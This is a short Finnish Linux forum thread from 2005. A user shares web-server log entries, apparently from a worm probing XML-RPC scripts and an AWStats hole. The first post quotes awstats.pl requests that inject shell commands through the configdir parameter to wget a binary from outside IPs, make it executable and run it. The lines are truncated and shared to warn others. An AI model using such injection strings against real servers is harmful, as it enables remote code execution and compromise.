Linux mato liikkeellä?

Discussion in 'Linux -keskustelu' started by .W., Nov 9, 2005.

  1. .W.

    .W. Regular member

    Joined:
    Mar 1, 2004
    Messages:
    838
    Likes Received:
    0
    Trophy Points:
    26
    Eilen uutisoitiin kesäkuussa löydetystä tietoturva aukosta xml-rpc rajapinnassa. Heti näkyy logissa hyökkäyksiä tuota aukkoa vasten: Logista:

    /xmlrpc.php
    /xmlrpc/xmlrpc.php
    /phpgroupware/xmlrpc.php
    /blog/xmlrpc.php
    /xmlsrv/xmlrpc.php
    /blogs/xmlsrv/xmlrpc.php
    /blog/xmlsrv/xmlrpc.php
    /wordpress/xmlrpc.php
    /drupal/xmlrpc.php

    Sekä siihen liittyvät:

    /scgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 62.101.193.244/lupii;chmod +x lup...
    /cgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 62.101.193.244/lupii;chmod +x lupi...


    Ja vielä uudemmat viimeyöltä jossa [bold]lupii[/bold] niminen tiedosto on muuttunut [bold]listen[/bold] nimiseksi.

    /cgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x list...
    /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./lis...
    /cgi-bin/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./lis...
     
  2. Faeryan

    Faeryan Regular member

    Joined:
    Oct 3, 2005
    Messages:
    282
    Likes Received:
    0
    Trophy Points:
    26
    Ei aiheeseen löytynyt mitään linkkejä? Missäs siellä lokitiedostoissa nuo mahdollisesti löytyvät ja onkos tuohon keksitty joku vastakeino? Tietty portti umpeen tjsp?
     
  3. .W.

    .W. Regular member

    Joined:
    Mar 1, 2004
    Messages:
    838
    Likes Received:
    0
    Trophy Points:
    26

Share This Page